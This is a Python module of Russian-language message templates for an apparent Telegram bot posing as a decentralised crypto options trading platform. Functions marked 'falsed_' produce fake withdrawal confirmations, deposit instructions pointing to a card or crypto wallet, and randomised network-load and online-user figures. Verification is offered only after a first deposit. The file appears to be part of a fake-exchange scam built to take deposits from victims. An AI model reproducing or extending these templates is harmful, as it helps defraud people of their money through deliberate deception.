import random2 as random

min_trade = 1500

# def account_text(verific,money,user_id,trans,online):
#     return f"Личный кабинет\n-----------------------------\nВерификация для вывода: {verific}\n-----------------------------\nОбщий баланс: {money}\nКриптопортфель:\n BTC: 0.0\n ETH: 0.0\n USDT: 0.0\n-----------------------------\nID: {user_id}\nВсего сделок: {trans}\n-----------------------------\nПользователей онлайн: {online}\n-----------------------------\n"


def account_text(verific,money,user_id,trans,online):

    btc = random.randint(1,3)
    eth = random.randint(1,3)
    lt = random.randint(1,3)

    if btc == 1:
        btc_menu = '🟢'
    elif btc == 2:
        btc_menu = '🟡'
    else:
        btc_menu = '🔴'

    if eth == 1:
        eth_menu = '🟢'
    elif eth == 2:
        eth_menu = '🟡'
    else:
        eth_menu = '🔴'

    if lt == 1:
        lt_menu = '🟢'
    elif lt == 2:
        lt_menu = '🟡'
    else:
        lt_menu = '🔴'

    return f"""📲 Личный кабинет
➖➖➖➖➖➖➖➖➖➖
📑 Верификация: {verific}
➖➖➖➖➖➖➖➖➖➖
💵 Общий баланс: {money}₽
💼 Криптопортфель:
   ETH: 0.0
   BTC: 0.0
   USDT: 0.0
➖➖➖➖➖➖➖➖➖➖
🗄 ID: {user_id}
📂 В обработке: 0.0₽
📊 Всего сделок: {trans}
➖➖➖➖➖➖➖➖➖➖
Всего штрафов: 0
Штраф: 0₽
Статус: Положительный
➖➖➖➖➖➖➖➖➖➖
📈 Пользователей онлайн: {online}
➖➖➖➖➖➖➖➖➖➖
Загруженность Bitcoin: {btc_menu}
Загруженность Ethereum: {eth_menu}
Загруженость Litecoin: {lt_menu}
➖➖➖➖➖➖➖➖➖➖"""


def trader_text():
    return f"""🔶 Опционы — это контракты, которые предусматривают право покупателя опциона купить или продать базовый актив в указанный период и по определенной цене.

Выберите криптовалюту для совершения сделки:"""


def all_trade_text():

    return f"Куда пойдёт стоимость актива?\n\nКоэффиценты:\nВверх - 2x\nНе изменится - 10x\nВниз - 2x"


def text_trade(moneys_new, money_plus, moneys_back):
    
    return f"Ваша ставка сработала!\nНа ваш баланс {moneys_back} прибавлено {money_plus}.\nТеперь ваш баланс: {moneys_new}.\n\nПосмотрите все данные в своём аккаунте или нажмите на кнопку для новой игры."

def text_trade_lose(moneys_new, money_plus, moneys_back):
    
    return f"Ваша ставка не сработала!\nс вашего баланса {moneys_back} убавлено {money_plus}.\nТеперь ваш баланс: {moneys_new}.\n\nПосмотрите все данные в своём аккаунте или нажмите на кнопку для новой игры."


def waiting_text(seconsd):

    return f'Подождите {seconsd} секунд, пока ваша ставка сработает'


def cash_back_text(money):

    return f'Вывод денег!\nВы можете вывести до {str(money)}\nПредупреждение! Отменить операцию будет нельзя!\nВведите сумму для вывода.'


def falsed_cash_back(money, number):
    
    return f'Сумма вашего вывода {money}, на номер +7{str(number)}'


def about_we_text(bot_name):

    return f"""📖{bot_name} децентрализованная платформа для торговли криптовалютой, фьючерсными активами, NFT, основанная на блокчейне Ethereum

{bot_name} можно использовать как кошелек для удобных операций с Ethereum блокчейном.

{bot_name} является некастодиальным сервисом, это означает, что никто другой не может получить доступ к вашим средствам – даже разработчики {bot_name}. Можно сказать, ваши токены существуют в зашифрованном хранилище, которое защищено паролем. Это означает, что если ваше устройство вход будет потерян, украден или уничтожен, вы не сможете восстановить кошелек.

Любые мнения, информация, обсуждения, анализ, цены и другая информация, которую мы отображаем на этой Платформе, не должны рассматриваться как инвестиционные рекомендации.

Мы не несем ответственности за любые убытки, возникающие прямо или косвенно в результате использования вышеупомянутой информации, включая, помимо прочего, любую упущенную выгоду."""

def helped_users_text(id_help, bot_name):

    return f"""✅ Вы можете открыть заявку в службу поддержки {bot_name}. Специалист ответит в ближайшие сроки. 
Для более быстрого решения проблемы описывайте свое обращение максимально четко, если необходимо, то можно предоставить файлы либо же изображения. 

Правила обращения в техподдержку:

┏ При первом обращении пожалуйста представьтесь 
┣ Опишите проблему своими словами 
┣ Укажите ваш айди из личного кабинета 
┗ Будьте вежливыми и вежливыми будут с вами!

⚠️ Памятка:
Адрес технической поддержки - {id_help}. Сотрудники технической поддержки никогда не пишут вам первыми."""

def verif_falsed_text():

    return f"""🔸 Мы рекомендуем всем пользователям верифицировать аккаунт. Вы можете это сделать после первого успешного пополнения баланса, нажав на кнопку ниже и написав 'Верификация' в Техническую Поддержку, спасибо!

┏ ✅ Преимущества верифицированного аккаунта:
┣ Приоритет в очереди к выводу
┣ Отсутствие лимитов на вывод средств
┣ Возможность хранить средства в разных активах
┗ Увеличение доверия со стороны администрации, предотвращения блокировки аккаунта"""


def falsed_top_up_for_card_text(card_num,cost):

    comment = random.randint(1000,99999)

    return f"Для пополнения счёта на {cost} руб., переведите их на номер '{card_num}' с комментарием '{comment}'!"


def falsed_top_up_for_crypto_text(crypto_num,cost):

    return f"Для пополнения счёта на {cost} руб., переведите их на номер крипто-кошелька {crypto_num}!"


def falsed_web():

    users_in_system = random.randint(2132, 2425) + random.randint(-414, 127)

    stress = random.randint(1,3)
    if stress == 1:
        web_stress = '🟢'
    elif stress == 2:
        web_stress = '🟡'
    else:
        web_stress = '🔴'


    return f"""📈Состояние сети Bitcoin

🔸Текущая загруженность: {web_stress}
┏ Количество блоков: ≈ 1
┣ Размер: 1.9 mB (1.4 mVB)
┗ Неподтверждённых транзакций: {users_in_system}

⚠️Комиссия для попадания в первый блок:
┏ Минимум: 0.00003072 BTC / kVB
┗Медиана: 0.00004096 BTC / kVB"""